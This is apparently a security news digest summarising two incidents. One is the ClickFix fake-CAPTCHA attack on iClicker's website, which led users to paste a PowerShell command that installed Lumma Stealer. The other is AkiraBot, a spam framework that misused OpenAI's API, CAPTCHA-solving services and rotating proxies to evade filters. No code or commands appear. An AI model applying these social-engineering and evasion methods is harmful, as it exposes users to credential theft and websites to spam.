FlagThis - #captcha

iClicker, a widely-used student engagement platform, fell victim to a sophisticated ClickFix attack that compromised its website. The attack utilized a fake CAPTCHA prompt to deceive both students and instructors into unknowingly installing malware on their devices. This incident highlights the growing trend of cybercriminals exploiting user trust through social engineering tactics. iClicker, a subsidiary of Macmillan, serves approximately 5,000 instructors and 7 million students across numerous universities in the United States, making it a prime target for such malicious activities. The company has acknowledged the hijacking and issued a security bulletin advising affected users to take immediate action.

The ClickFix attack hinges on exploiting the familiarity users have with CAPTCHA verification processes. Instead of presenting a typical challenge to distinguish between humans and bots, the fake CAPTCHA prompts users to execute malicious scripts. This involves instructing users to open the Windows Run dialog, paste a provided script, and press Enter. Unbeknownst to the user, this action initiates a PowerShell script that retrieves and installs malware, granting attackers unauthorized access to their computer. The University of Michigan’s IT security team issued an early warning to students after discovering the malicious CAPTCHA.

Sophos X-Ops revealed that the malware being installed through this method is the notorious Lumma Stealer. Lumma Stealer is a Malware-as-a-Service (MaaS) offering typically sold via Telegram channels, allowing cybercriminals to steal sensitive data, including browser passwords, cookies, cryptocurrency wallets, and session tokens. iClicker advised users who interacted with the false CAPTCHA between April 12-16 to run antivirus software and change their passwords immediately. The attack demonstrates the need for heightened cybersecurity awareness and vigilance when interacting with online prompts, even on trusted websites.


References :

• securityonline.info: CAPTCHA Trap: Fake Verification Unleashes Lumma Stealer on Unsuspecting Users
• Talkback Resources: Website Hacked with Fake CAPTCHA in ClickFix Attack
• The DefendOps Diaries: The ClickFix Attack: Unmasking the Fake CAPTCHA Deception
• BleepingComputer: iClicker site hack targeted students with malware via fake CAPTCHA

Classification:

• HashTags: #CyberAttack #Malware #ClickFix
• Company: iClicker
• Target: Students and Instructors
• Product: iClicker
• Feature: CAPTCHA
• Malware: Lumma Stealer
• Type: Malware
• Severity: Medium

AkiraBot, an AI-powered botnet, has been identified as the source of a widespread spam campaign targeting over 80,000 websites since September 2024. This sophisticated framework leverages OpenAI's API to generate custom outreach messages tailored to the content of each targeted website, effectively promoting dubious SEO services. Unlike typical spam tools, AkiraBot employs advanced CAPTCHA bypass mechanisms and network detection evasion techniques, posing a significant challenge to website security. It achieves this by rotating attacker-controlled domain names and using AI-generated content, making it difficult for traditional spam filters to identify and block the messages.

AkiraBot operates by targeting contact forms and chat widgets embedded on small to medium-sized business websites. The framework is modular and specifically designed to evade CAPTCHA filters and avoid network detections. To bypass CAPTCHAs, AkiraBot mimics legitimate user behavior, and uses services like Capsolver, FastCaptcha, and NextCaptcha. It also relies on proxy services like SmartProxy, typically used by advertisers, to rotate IP addresses and maintain geographic anonymity, preventing rate-limiting and system-wide blocks.

The use of OpenAI's language models, specifically GPT-4o-mini, allows AkiraBot to create unique and personalized spam messages for each targeted site. By scraping site content, the bot generates messages that appear authentic, increasing engagement and evading traditional spam filters. While OpenAI has since revoked the spammers' account, the four months the activity went unnoticed highlight the reactive nature of enforcement and the emerging challenges AI poses to defending websites against spam attacks. This sophisticated approach marks a significant evolution in spam tactics, as the individualized nature of AI-generated content complicates detection and blocking measures.


References :

• cyberinsider.com: AI-Powered AkiraBot Operation Bypasses CAPTCHAs on 80,000 Sites
• hackread.com: New AkiraBot Abuses OpenAI API to Spam Website Contact Forms
• www.sentinelone.com: AkiraBot | AI-Powered Bot Bypasses CAPTCHAs, Spams Websites At Scale
• The Hacker News: Cybersecurity researchers have disclosed details of an artificial intelligence (AI) powered platform called AkiraBot that's used to spam website chats, comment sections, and contact forms to promote dubious search engine optimization (SEO) services such as Akira and ServicewrapGO.
• Cyber Security News: AkiraBot’s CAPTCHA‑Cracking, Network‑Dodging Spam Barrage Hits 80,000 Websites
• securityaffairs.com: AkiraBot: AI-Powered spam bot evades CAPTCHA to target 80,000+ websites
• gbhackers.com: AkiraBot Floods 80,000 Sites After Outsmarting CAPTCHAs and Slipping Past Network Defenses
• cyberpress.org: AkiraBot’s CAPTCHA‑Cracking, Network‑Dodging Spam Barrage Hits 80,000 Websites
• gbhackers.com: AkiraBot Floods 80,000 Sites After Outsmarting CAPTCHAs and Slipping Past Network Defenses
• www.scworld.com: Sweeping SMB site targeting conducted by novel AkiraBot spamming tool
• 404 Media: Scammers Used OpenAI to Flood the Web with SEO Spam
• CyberInsider: AI-Powered AkiraBot Operation Bypasses CAPTCHAs on 80,000 Sites
• hackread.com: New AkiraBot Abuses OpenAI API to Spam Website Contact Forms, 400,000 Impacted
• : Scammers used OpenAI as part of a bot that flooded the web with SEO spam. Also bypassed CAPTCHA https://www.404media.co/scammers-used-openai-to-flood-the-web-with-seo-spam/
• Security Risk Advisors: SentinelOne's analysis of AkiraBot's capabilities and techniques.
• www.sentinelone.com: SentinelOne blog post about AkiraBot spamming chats and forms with AI pitches.
• arstechnica.com: OpenAI’s GPT helps spammers send blast of 80,000 messages that bypassed filters
• Ars OpenForum: OpenAI’s GPT helps spammers send blast of 80,000 messages that bypassed filters
• Digital Information World: New AkiraBot Targets Hundreds of Thousands of Websites with OpenAI-Based Spam
• TechSpot: Sophisticated bot uses OpenAI to bypass filters, flooding over 80,000 websites with spam
• futurism.com: OpenAI Is Taking Spammers' Money to Pollute the Internet at Unprecedented Scale
• PCMag Middle East ai: Scammers Use OpenAI API to Flood 80,000 Websites With Spam
• www.sentinelone.com: Police arrest SmokeLoader malware customers, AkiraBot abuses AI to bypass CAPTCHAs, and Gamaredon delivers GammaSteel via infected drives.
• securityonline.info: AkiraBot: AI-Powered Spam Bot Floods Websites with Personalized Messages
• PCMag UK security: Scammers Use OpenAI API to Flood 80,000 Websites With Spam
• www.pcmag.com: PCMag article about the use of GPT-4o-mini in the AkiraBot spam campaign.
• Virus Bulletin: SentinelLABS researchers look into AkiraBot, a framework used to spam website chats and contact forms en masse to promote a low-quality SEO service. The bot uses OpenAI to generate custom outreach messages & employs multiple CAPTCHA bypass mechanisms.
• Daily CyberSecurity: Spammers are constantly adapting their tactics to exploit new digital communication channels.

Classification:

• HashTags: #AkiraBot #OpenAI #AISpam
• Company: OpenAI
• Target: Websites
• Attacker: AkiraBot
• Product: OpenAI API
• Feature: CAPTCHA Bypass
• Malware: AkiraBot
• Type: AI
• Severity: Medium